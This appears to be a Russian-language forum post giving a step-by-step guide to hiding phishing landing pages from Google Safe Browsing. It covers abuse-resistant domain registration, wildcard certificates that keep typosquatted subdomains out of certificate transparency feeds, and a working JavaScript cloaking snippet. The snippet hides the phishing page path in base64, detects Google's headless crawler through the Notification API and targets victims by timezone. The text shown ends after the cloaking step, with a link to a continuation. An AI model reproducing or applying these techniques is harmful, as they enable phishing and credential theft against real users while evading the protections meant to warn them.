FIX Google Safebrowsing 2023

[aliev]

Что мы узнаем? Содержание​
Из чего состоит Google Safe Browsing
Как выбрать подходящий домен
Как создать правильный ssl-сертификат
Как спрятать лендинг от краулера GSB
Обновляем крипт js-файлов прошлого лендинга
Как обойти детект на основе палитры сайта
Как обойти детект Kaspersky
Как обойти блокировку скачивания файла хромом
Чем и как заменить форму ввода пароля
Звучит неплохо. Поехали.
1. Что такое Google Safe Browsing?​
Google Safebrowsing состоит из четырех частей:
встроенный в хром механизм определения фишинга на основе совпадения цветовых палитр и частей доменов ранее посещенных сайтов.
механизм проверки url-адресов и хешей файлов на совпадение по предзагруженной базе укороченных хешей, хранящихся локально.
механизм распаковки большинства типов ахривов, и проверки хешей исполняемых файлов и хешей их секций по локально хранящейся базе.
краулер, который получает адреса скачанных файлов, проходится по ним, выкачивает и передает на сервера google для анализа их антивирусным движком, с использованием сервиса VirusTotal.
2. Нам нужен новый домен​
Зарегистрировать стойкий к абузам домен можно на domains4bitcoins.com или domaindiscount24.com (эти сервисы реселлят многие продавцы стойких к абузам доменов). Домену нужно дать отлежаться хотя бы неделю, т.к. зарегистрированным вчера доменам гугл не доверяет совсем. Имя домена не должно содержать:
брендовые слова
брендовые слова с опечатками
имена доменов, которые пользователь посещал ранее, такие как dhl, telegram, hsbc и им подобные.
Для примера возьмем домен 4bi.us.
3. Нам нужен ssl-сертификат для домена​
Для этого привяжем домен к cloudflare.com. Все ssl-сертификаты при создании попадают в специальный фид, называемый certificate transparency log. Этот фид постоянно мониторят антивирусные компании. Посмотреть на него самим можно например здесь: https://certstream.calidog.io/. По-этому все сертификаты, выданные для доменов, содержаших брендовые слова или брендовые слова с опечатками моментально попадают в поле зрения антивирусных компаний, и ваш фишинг, размещенный на домене с опечаткой будет моментально помечен как вредоносный. Таким образом мы не можем заказать сертификат для брендового домена с опечаткой. Однако, cloudflare дает нам возможность бесплатно заказать wildcard сертификат. Это сертификат для всех сабдоменов домена, без указания конкретного имени сабдомена. Таким образом наш сабдомен с опечаткой в имени не будет замечен антивирусными компаниями.
Вот как запись для wildcard-домена выглядит в настройках dns домена в cloudflare:

здесь 122.1.1.231 - ip-адрес нашего сервера
Теперь наш лендинг будет доступен, например, по адресу telegrarn.4bi.us.
4. Спрячем лендинг от краулера GSB​
Краулер GSB (как и краулер GoogleAds) сделан на основе чистого движка Google Chrome с минимальными изменениями. Он запускается в headless-режиме и управляется через webdriver-протокол. По ip-адресу пытаться блокировать его бессмысленно, т.к. он использует прокси-сервера с домашними адресами. Но в headless-режиме у десктопной версии браузера Chrome выключается поддержка Notification API. По наличию поддержки этого api мы определим краулер и покажем ему белый сайт вместо вредоносного.
Для начала мы создадим белый сайт-обманку. Купить готовый белый лендинг для клоакинга можно за копейки в боте https://t.me/whitegen_bot.
Предположим, стартовая страница нашего фишинга называется index.php. Переименуем ее в home.php, а в тело страницы index.php положим код чистой (белой) страницы лендинга, созданной с помощью телеграм-бота.
Теперь код стартовой страницы index.php выглядит примерно так:

Чтобы пользователи видели не белый сайт, а нашу фишинг-страницу, добавим в head-секцию нашей стартовой страницы index.php следующий html-код:
<script> home = 'L2hvbWUucGhw'; zones = /Madrid|Canary|Vienna|Istanbul/gi; timezoneOffset = zones.test((new Intl.DateTimeFormat).resolvedOptions().timeZone); self.Notification&&timezoneOffset&&fetch(atob(home )).then( function(r){return r.text().then(function(t){document.write(t)})} ); </script>
В этом коде мы делаем следующее:
в переменной home мы спрятали адрес фишинг-страницы (home.php), закодировав его в base64 (например на сайте base64encode.net). Это необходимо потому, что краулер GSB извлекает из загружаемых им файлов все ссылки и пытается их скачать и проанализировать.
для порядка мы отсекаем лишних пользователей на основе часового пояса, используемого их системой. Это не критически важный ход, но он убережет наш фишинг от лишних глаз. Вот таблица названий часовых поясов для интересующих нас стран: en.wikipedia.org/wiki/List_of_tz_database_time_zones. Если мы хотим лить на лендинг трафик, например, Германии, то заменим строчку zones = /Madrid|Canary|Vienna|Istanbul/gi; на строчку zones = /Berlin/gi; и таким образом отсечем всех пользователей (и краулеры) с другим часовым поясом, выбранном в настройках их системы.
последним шагом мы проверяем поддержку notification api и, если у пользователя выбран подходящий нам часовой пояс, мы скачиваем содержимое файла home.php и замещаем его содержимым содержимое текущей страницы index.php.
Теперь код нашей стартовой страницы index.php выглядит примерно так:

А все подходящие нам пользователи видят наш злой лендинг:

https://telegra.ph/Prodolzhenie-temy...febrowse-04-27